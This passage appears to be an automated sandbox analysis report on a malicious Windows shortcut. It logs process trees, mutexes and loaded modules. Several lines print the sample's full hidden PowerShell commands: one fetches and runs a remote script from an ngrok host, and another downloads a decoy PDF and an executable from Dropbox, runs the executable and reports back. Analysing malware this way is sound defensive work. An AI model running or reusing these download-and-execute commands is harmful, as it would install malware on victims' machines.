                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 19_2_00007FF848F19A4819_2_00007FF848F19A48
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 19_2_00007FF848F193E819_2_00007FF848F193E8
                      Source: C:\Users\user\AppData\Local\Temp\678f1ad3-4458-46d8-ad95-b8d4b2696f10.exeCode function: 25_2_004781A925_2_004781A9
                      Source: C:\Users\user\AppData\Local\Temp\678f1ad3-4458-46d8-ad95-b8d4b2696f10.exeCode function: 26_3_0270C23126_3_0270C231
                      Source: C:\Users\user\AppData\Local\Temp\678f1ad3-4458-46d8-ad95-b8d4b2696f10.exeCode function: 26_3_027181D226_3_027181D2
                      Source: C:\Users\user\AppData\Local\Temp\678f1ad3-4458-46d8-ad95-b8d4b2696f10.exeCode function: 26_3_0270C40026_3_0270C400
                      Source: C:\Users\user\AppData\Local\Temp\678f1ad3-4458-46d8-ad95-b8d4b2696f10.exeCode function: 26_2_004781A926_2_004781A9
                      Source: C:\Windows\System32\fontdrvhost.exeCode function: 31_2_00000160FB070C7031_2_00000160FB070C70
                      Source: C:\Users\user\AppData\Local\Temp\678f1ad3-4458-46d8-ad95-b8d4b2696f10.exeCode function: String function: 0270CD90 appears 33 times
                      Source: C:\Users\user\AppData\Local\Temp\678f1ad3-4458-46d8-ad95-b8d4b2696f10.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 8992 -s 204
                      Source: 678f1ad3-4458-46d8-ad95-b8d4b2696f10.exe.19.drStatic PE information: Resource name: BRANDING type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                      Source: PerfectoUna.exe.25.drStatic PE information: Resource name: BRANDING type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                      Source: 678f1ad3-4458-46d8-ad95-b8d4b2696f10.exe, 00000019.00000002.2711069285.0000000002C09000.00000040.00001000.00020000.00000000.sdmp, 678f1ad3-4458-46d8-ad95-b8d4b2696f10.exe, 00000019.00000002.2710169833.00000000005E8000.00000040.00000001.01000000.0000000F.sdmp, 678f1ad3-4458-46d8-ad95-b8d4b2696f10.exe, 0000001A.00000003.2667807097.0000000002729000.00000040.00000400.00020000.00000000.sdmp, 678f1ad3-4458-46d8-ad95-b8d4b2696f10.exe, 0000001A.00000003.2675735037.0000000002729000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: .a_po^ ojYd.o B U.R G v.Q_F& ZNH K.9.sV`OQ qOq_A( N5.j P.X z.k.Yf_HL.P.L`.C Ue_q_B_t.h{_yr\=A f.3_q_Fvb_H_bm W.UP#.by_iY.Yw I.Y_G p.3c g.Zy S v.U.N C_m Z_i.H_j B l_DH_Pd.iz_O.f~ U z_Mv_d7 T Mz.f.594/}_m kS.v.D u.rZu.S G.N_x.V J.Q.G FO^.X<.6_fv.V ny.L,_E.2.m I_l.b$ Mx sZ.K! p.Y.U.V:U.89 R_H F3.d_R A UQ.C_y y Y Jb.Q_S.N.s< l_Ab~[_w9zV?!C9.N_HQ)*_n R.tP Ww_u aU;.V EPk Xr.Q0.y.A!]_b!7 g.R_pF.E_b o.o.q.o_E.T_rdfw.c}_ck.4.Y_w:_P.B(#`_xy_i.3_Y.A_N.q.6.YE_S_T.R H n.R_d_F.V.s_R68).I aL q.H b.W.Q!.r b_w c c$_va.X_v.tRm l.sln_D c! C.7_F m M_j6 zr.w F i}%_N.RB A7_wG_m.4_A#&.G mCx.Q_s N pTS.n.e C.4_v_C_Q.e J q7E V P.LP_Q.kTN_c.F.D gc.hT_s_Q1
                      Source: 678f1ad3-4458-46d8-ad95-b8d4b2696f10.exe, 678f1ad3-4458-46d8-ad95-b8d4b2696f10.exe, 00000019.00000002.2711069285.0000000002C09000.00000040.00001000.00020000.00000000.sdmp, 678f1ad3-4458-46d8-ad95-b8d4b2696f10.exe, 00000019.00000002.2710169833.00000000005E8000.00000040.00000001.01000000.0000000F.sdmp, 678f1ad3-4458-46d8-ad95-b8d4b2696f10.exe, 0000001A.00000003.2667807097.0000000002729000.00000040.00000400.00020000.00000000.sdmp, 678f1ad3-4458-46d8-ad95-b8d4b2696f10.exe, 0000001A.00000003.2675735037.0000000002729000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: .tRm l.sln_D c! C.7_F m M_j6 zr.w F i}%_N.RB A7_wG_m.4_A#&.G mCx.Q_s N pTS.n.e C.4_v_
                      Source: classification engineClassification label: mal100.troj.evad.winLNK@82/283@21/10
                      Source: C:\Users\user\AppData\Local\Temp\678f1ad3-4458-46d8-ad95-b8d4b2696f10.exeCode function: 25_2_004149D0 PathRemoveFileSpecW,GetLastError,WaitForSingleObject,GetExitCodeProcess,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,TerminateProcess,CloseHandle,CloseHandle,CloseHandle,Sleep,25_2_004149D0
                      Source: C:\Users\user\AppData\Local\Temp\678f1ad3-4458-46d8-ad95-b8d4b2696f10.exeCode function: 25_2_004029A0 StartServiceCtrlDispatcherW,GetLastError,25_2_004029A0
                      Source: C:\Users\user\AppData\Local\Temp\678f1ad3-4458-46d8-ad95-b8d4b2696f10.exeCode function: 25_2_004029A0 StartServiceCtrlDispatcherW,GetLastError,25_2_004029A0
                      Source: C:\Users\user\AppData\Local\Temp\678f1ad3-4458-46d8-ad95-b8d4b2696f10.exeCode function: 26_2_004029A0 StartServiceCtrlDispatcherW,GetLastError,26_2_004029A0
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCacheJump to behavior
                      Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess8572
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeMutant created: \Sessions\1\BaseNamedObjects\MSCTF.Asm.{00000009-c7331d53-a9b0-47e184-2a3bb56f4bc8}
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8940:120:WilError_03
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_aiiy5ukj.ztu.ps1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\475161710.bat" "
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\System32\conhost.exeFile read: C:\Users\desktop.iniJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
                      Source: xWpAZpLw47.lnkVirustotal: Detection: 29%
                      Source: unknownProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias aab784 curl ; sal avfea3 iEx ; avfea3(aab784 -Uri https://23glcrtmzxqgwfpq3oujitt.ngrok.pizza/api/secure/f08a7638d48ba191b651003837c0a34d -UseBasicParsing)
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias aab784 curl ; sal avfea3 iEx ; avfea3(aab784 -Uri https://23glcrtmzxqgwfpq3oujitt.ngrok.pizza/api/secure/f08a7638d48ba191b651003837c0a34d -UseBasicParsing)
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --kiosk https://www.dropbox.com/scl/fi/zswwoz1nsshfdhbgdi9dy/Documents-about-company-information-and-job-descriptions-4.pdf?rlkey=xb4z4b9qljepnpiu5mkjz888q&dl=1
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                      Source: unknownProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --kiosk --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate https://www.dropbox.com/scl/fi/zswwoz1nsshfdhbgdi9dy/Documents-about-company-information-and-job-descriptions-4.pdf?rlkey=xb4z4b9qljepnpiu5mkjz888q&dl=1
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2252 --field-trial-handle=2036,i,15400410564020983151,12558910162901878571,262144 /prefetch:3
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2156 --field-trial-handle=2108,i,2589558739445175851,9119733376117647865,262144 /prefetch:3
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6388 --field-trial-handle=2108,i,2589558739445175851,9119733376117647865,262144 /prefetch:8
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6664 --field-trial-handle=2108,i,2589558739445175851,9119733376117647865,262144 /prefetch:8
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\475161710.bat" "
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -wIndoWStYLe hiDdeN -NoProfile -Command "$RandomPDF = Join-Path -Path $env:TEMP -ChildPath ('{0}.pdf' -f ([guid]::NewGuid())); $RandomEXE = Join-Path -Path $env:TEMP -ChildPath ('{0}.exe' -f ([guid]::NewGuid())); Invoke-WebRequest -Uri 'https://www.dropbox.com/scl/fi/zswwoz1nsshfdhbgdi9dy/Documents-about-company-information-and-job-descriptions-4.pdf?rlkey=xb4z4b9qljepnpiu5mkjz888q&dl=1' -OutFile $RandomPDF; Start-Process -FilePath 'msedge.exe' -ArgumentList '--kiosk', $RandomPDF; Invoke-WebRequest -Uri 'https://www.dropbox.com/scl/fi/uv9rtex94bi18x6hfwnvm/runner.exe?rlkey=ohh5enlv6dylr9jqxqwsffkja&dl=1' -OutFile $RandomEXE; Start-Process -FilePath $RandomEXE; if (Test-Path $RandomEXE) { Invoke-WebRequest -Uri 'https://23glcrtmzxqgwfpq3oujitt.ngrok.pizza/metadata/f08a7638d48ba191b651003837c0a34d'; }"
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --lang=en-GB --service-sandbox-type=collections --mojo-platform-channel-handle=7884 --field-trial-handle=2108,i,2589558739445175851,9119733376117647865,262144 /prefetch:8
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --kiosk C:\Users\user\AppData\Local\Temp\aff7310e-e430-4b16-86a8-ee19b2c5c7f2.pdf
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2068 --field-trial-handle=1792,i,8736209801987075174,5153992898519663710,262144 /prefetch:3
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=ppapi --lang=en-GB --device-scale-factor=1 --ppapi-antialiased-text-enabled=1 --ppapi-subpixel-rendering-setting=1 --mojo-platform-channel-handle=8304 --field-trial-handle=2108,i,2589558739445175851,9119733376117647865,262144 /prefetch:6
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\678f1ad3-4458-46d8-ad95-b8d4b2696f10.exe "C:\Users\user\AppData\Local\Temp\678f1ad3-4458-46d8-ad95-b8d4b2696f10.exe"
                      Source: C:\Users\user\AppData\Local\Temp\678f1ad3-4458-46d8-ad95-b8d4b2696f10.exeProcess created: C:\Users\user\AppData\Local\Temp\678f1ad3-4458-46d8-ad95-b8d4b2696f10.exe "C:\Users\user\AppData\Local\Temp\678f1ad3-4458-46d8-ad95-b8d4b2696f10.exe"
                      Source: C:\Users\user\AppData\Local\Temp\678f1ad3-4458-46d8-ad95-b8d4b2696f10.exeProcess created: C:\Windows\SysWOW64\fontdrvhost.exe "C:\Windows\System32\fontdrvhost.exe"
                      Source: C:\Users\user\AppData\Local\Temp\678f1ad3-4458-46d8-ad95-b8d4b2696f10.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 8992 -s 204
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeProcess created: C:\Windows\System32\fontdrvhost.exe "C:\Windows\System32\fontdrvhost.exe"
                      Source: C:\Windows\System32\fontdrvhost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 8572 -s 144
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=6692 --field-trial-handle=2108,i,2589558739445175851,9119733376117647865,262144 /prefetch:8
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias aab784 curl ; sal avfea3 iEx ; avfea3(aab784 -Uri https://23glcrtmzxqgwfpq3oujitt.ngrok.pizza/api/secure/f08a7638d48ba191b651003837c0a34d -UseBasicParsing)Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --kiosk https://www.dropbox.com/scl/fi/zswwoz1nsshfdhbgdi9dy/Documents-about-company-information-and-job-descriptions-4.pdf?rlkey=xb4z4b9qljepnpiu5mkjz888q&dl=1 Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\475161710.bat" "Jump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2252 --field-trial-handle=2036,i,15400410564020983151,12558910162901878571,262144 /prefetch:3Jump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2156 --field-trial-handle=2108,i,2589558739445175851,9119733376117647865,262144 /prefetch:3Jump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6388 --field-trial-handle=2108,i,2589558739445175851,9119733376117647865,262144 /prefetch:8Jump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6664 --field-trial-handle=2108,i,2589558739445175851,9119733376117647865,262144 /prefetch:8Jump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --lang=en-GB --service-sandbox-type=collections --mojo-platform-channel-handle=7884 --field-trial-handle=2108,i,2589558739445175851,9119733376117647865,262144 /prefetch:8Jump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=ppapi --lang=en-GB --device-scale-factor=1 --ppapi-antialiased-text-enabled=1 --ppapi-subpixel-rendering-setting=1 --mojo-platform-channel-handle=8304 --field-trial-handle=2108,i,2589558739445175851,9119733376117647865,262144 /prefetch:6Jump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=6692 --field-trial-handle=2108,i,2589558739445175851,9119733376117647865,262144 /prefetch:8Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -wIndoWStYLe hiDdeN -NoProfile -Command "$RandomPDF = Join-Path -Path $env:TEMP -ChildPath ('{0}.pdf' -f ([guid]::NewGuid())); $RandomEXE = Join-Path -Path $env:TEMP -ChildPath ('{0}.exe' -f ([guid]::NewGuid())); Invoke-WebRequest -Uri 'https://www.dropbox.com/scl/fi/zswwoz1nsshfdhbgdi9dy/Documents-about-company-information-and-job-descriptions-4.pdf?rlkey=xb4z4b9qljepnpiu5mkjz888q&dl=1' -OutFile $RandomPDF; Start-Process -FilePath 'msedge.exe' -ArgumentList '--kiosk', $RandomPDF; Invoke-WebRequest -Uri 'https://www.dropbox.com/scl/fi/uv9rtex94bi18x6hfwnvm/runner.exe?rlkey=ohh5enlv6dylr9jqxqwsffkja&dl=1' -OutFile $RandomEXE; Start-Process -FilePath $RandomEXE; if (Test-Path $RandomEXE) { Invoke-WebRequest -Uri 'https://23glcrtmzxqgwfpq3oujitt.ngrok.pizza/metadata/f08a7638d48ba191b651003837c0a34d'; }"
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --kiosk C:\Users\user\AppData\Local\Temp\aff7310e-e430-4b16-86a8-ee19b2c5c7f2.pdf
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\678f1ad3-4458-46d8-ad95-b8d4b2696f10.exe "C:\Users\user\AppData\Local\Temp\678f1ad3-4458-46d8-ad95-b8d4b2696f10.exe"
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2068 --field-trial-handle=1792,i,8736209801987075174,5153992898519663710,262144 /prefetch:3
                      Source: C:\Users\user\AppData\Local\Temp\678f1ad3-4458-46d8-ad95-b8d4b2696f10.exeProcess created: C:\Users\user\AppData\Local\Temp\678f1ad3-4458-46d8-ad95-b8d4b2696f10.exe "C:\Users\user\AppData\Local\Temp\678f1ad3-4458-46d8-ad95-b8d4b2696f10.exe"
                      Source: C:\Users\user\AppData\Local\Temp\678f1ad3-4458-46d8-ad95-b8d4b2696f10.exeProcess created: C:\Windows\SysWOW64\fontdrvhost.exe "C:\Windows\System32\fontdrvhost.exe"
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeProcess created: C:\Windows\System32\fontdrvhost.exe "C:\Windows\System32\fontdrvhost.exe"
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
